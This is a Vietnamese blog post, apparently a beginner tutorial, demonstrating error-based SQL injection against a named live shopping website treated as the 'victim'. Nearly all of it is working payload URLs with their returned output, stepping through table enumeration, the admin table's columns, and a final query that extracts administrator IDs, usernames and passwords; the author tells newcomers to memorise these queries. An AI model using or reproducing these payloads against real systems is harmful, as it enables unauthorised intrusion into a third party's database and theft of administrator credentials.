Lần này victim là :
Trích:
http://www.bk2.vn |
Result:
Trích:
Microsoft OLE DB Provider for SQL Server error '80040e14' Unclosed quotation mark before the character string ''. /danhsach_sp.asp, line 251 |
Lấy hết table nha ! Ở bk2.vn các bạn có thể query bình thường để lấy thông tin tables và columns ... ngoài ra các bạn cũng có thể dùng advance SQL cho nhanh -> muốn xài được advance SQL các bạn tự tìm bug trên đó nha
Ở đây mình viết các query basic cho các bạn chưa biết gì tham khảo còn các bạn khác thì chắc dùng tool luôn chứ chả mấy khi query hands made nhỉ
Table đầu tiên nha:
Trích:
http://www.bk2.vn/danhsach_sp.asp?sid=55%20and 1=convert(int,(select top 1 table_name from information_schema.tables))--sp_password |
Trích:
admin |
Trích:
http://www.bk2.vn/danhsach_sp.asp?sid=55%20and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('admin')))--sp_password |
Trích:
customer |
Trích:
http://www.bk2.vn/danhsach_sp.asp?sid=55%20and1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('admin','customer')))--sp_password |
Trích:
viewOrder |
Trích:
'admin/category/customer/dtproperties/feedback/logo/news/orderDetail/orders/product/subCategory/sysconstraints/syssegments/viewOrder/viewTop10/' |
Trích:
http://www.bk2.vn/danhsach_sp.asp?sid=55%20and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='admin'))--sp_password |
Trích:
ad_name |
Trích:
http://www.bk2.vn/danhsach_sp.asp?sid=55%20and1=convert(int,(select top 1 column_name from information_schema.columns where table_name='admin' and column_name not in('ad_name')))--sp_password |
Trích:
ad_pass |
Trích:
'ad_id/ad_name/ad_pass/' |
Trích:
http://www.bk2.vn/danhsach_sp.asp?sid=55%20and1=convert(int,(select top 1 convert(varchar,isnull(convert(varchar,ad_id),'NUL L')) %2b'/'%2bconvert(varchar,isnull(convert(varchar, ad_name),'NULL')) %2b'/'%2bconvert(varchar,isnull(convert(varchar, ad_pass),'NULL')) from admin order by ad_id asc))--sp_password |
bài này chỉ dừng ở đây nếu ai làm ko ra thì kiếm tut khác cùng thể loại để đọc nha. Mình chỉ muốn các bạn mới làm quen với SQL injection học thuộc mấy cái query trên thôi.
thank for reading
0 nhận xét :
Đăng nhận xét